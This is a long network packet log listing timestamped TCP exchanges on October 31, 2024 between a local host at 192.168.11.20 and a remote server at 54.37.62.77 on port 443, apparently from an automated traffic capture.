                                                                                                                                                                                                  Oct 31, 2024 18:05:22.709981918 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.710148096 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.710551977 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.710592031 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.710717916 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.710717916 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.710869074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.710870028 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.710894108 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.711450100 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.711502075 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.711605072 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.711605072 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.711631060 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.711654902 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.711654902 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.711792946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.712361097 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.712416887 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.712580919 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.712580919 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.712610006 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.712706089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.712728977 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.713192940 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.713237047 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.713344097 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.713344097 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.713365078 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.713392019 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.713392019 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.713440895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.713490009 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.716100931 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.719017029 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.802238941 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.802282095 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.802454948 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.802455902 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.802501917 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.802501917 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.802522898 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.802553892 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.802695036 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.802999020 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.803041935 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.803193092 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.803193092 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.803237915 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.803237915 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.803258896 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.803282022 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.803433895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.804029942 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.804064989 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.804214954 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.804214954 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.804260015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.804260015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.804282904 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.804305077 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.804456949 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.805133104 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.805174112 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.805318117 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.805318117 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.805363894 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.805363894 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.805386066 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.805408955 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.805562973 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.806972980 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.807008982 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.807161093 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.807161093 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.807207108 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.807207108 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.807229042 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.807252884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.807377100 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.813436031 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.813505888 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.813623905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.813625097 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.813698053 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.813698053 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.813698053 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.813741922 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.813899040 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.814305067 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.814361095 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.814466000 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.814466000 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.814510107 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.814534903 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.814562082 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.814656019 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.814696074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.819504023 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.819561005 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.819700956 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.819701910 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.819761992 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.819762945 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.819762945 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.819806099 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.819952011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.820544004 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.820590019 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.820741892 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.820741892 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.820791006 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.820791006 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.820791006 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.820822954 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.821005106 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.821494102 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.821537971 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.821674109 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.821674109 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.821722984 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.821722984 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.821722984 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.821753025 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.821904898 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.822567940 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.822612047 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.822716951 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.822716951 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.822813988 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.822865963 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.822885990 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.822885990 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.823000908 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.823705912 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.823751926 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.823782921 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.823847055 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.823847055 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.823896885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.823921919 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.823945045 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.824047089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.824091911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.824836016 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.824881077 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.825041056 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.825041056 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.825103998 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.825103998 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.825134039 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.825165987 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.825279951 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.825500011 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.825544119 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.825716019 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.825716019 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.825716019 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.825716019 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.825784922 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.825808048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.826004028 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.826210976 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.826255083 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.826384068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.826384068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.826468945 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.826468945 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.826468945 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.826508045 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.826690912 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.826929092 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.826972008 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.827124119 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.827125072 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.827172041 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.827172995 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.827199936 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.827235937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.827377081 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.827934980 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.828006029 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.828128099 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.828129053 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.828177929 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.828177929 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.828178883 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.828210115 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.828382015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.828963995 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.829015970 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.829133987 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.829133987 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.829183102 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.829183102 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.829224110 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.829252958 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.829379082 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.829904079 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.829948902 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.830049992 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.830049992 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.830105066 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.830130100 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.830157042 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.830157042 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.830302000 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.830895901 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.830943108 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.831084967 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.831084967 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.831132889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.831132889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.831161022 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.831197023 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.831326008 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.831748962 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.831792116 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.831893921 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.831893921 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.831940889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.831974030 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.832005024 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.832005978 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.832155943 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.832948923 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.833009005 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.833137989 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.833138943 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.833200932 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.833200932 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.833240032 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.833264112 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.833425045 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.849585056 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.028696060 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.028759956 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.028903961 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.028966904 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.029159069 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.029238939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.029274940 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.029603004 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.029638052 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.029654980 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.029666901 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.029784918 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.029784918 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.029830933 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.029886007 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.029886007 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.029905081 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.029932022 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.029932022 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.029932022 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.029962063 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.030016899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.030016899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.030040979 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.030064106 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.030163050 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.030213118 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.030213118 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.030236959 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.030265093 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.030265093 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.030312061 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.030312061 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.030359983 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.030410051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.030421019 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.031805992 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.031805992 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.033441067 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.033499956 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.033623934 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.033695936 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.033695936 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.033695936 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.033736944 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.033763885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.033972025 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.034187078 CET4434975554.37.62.77192.168.11.20
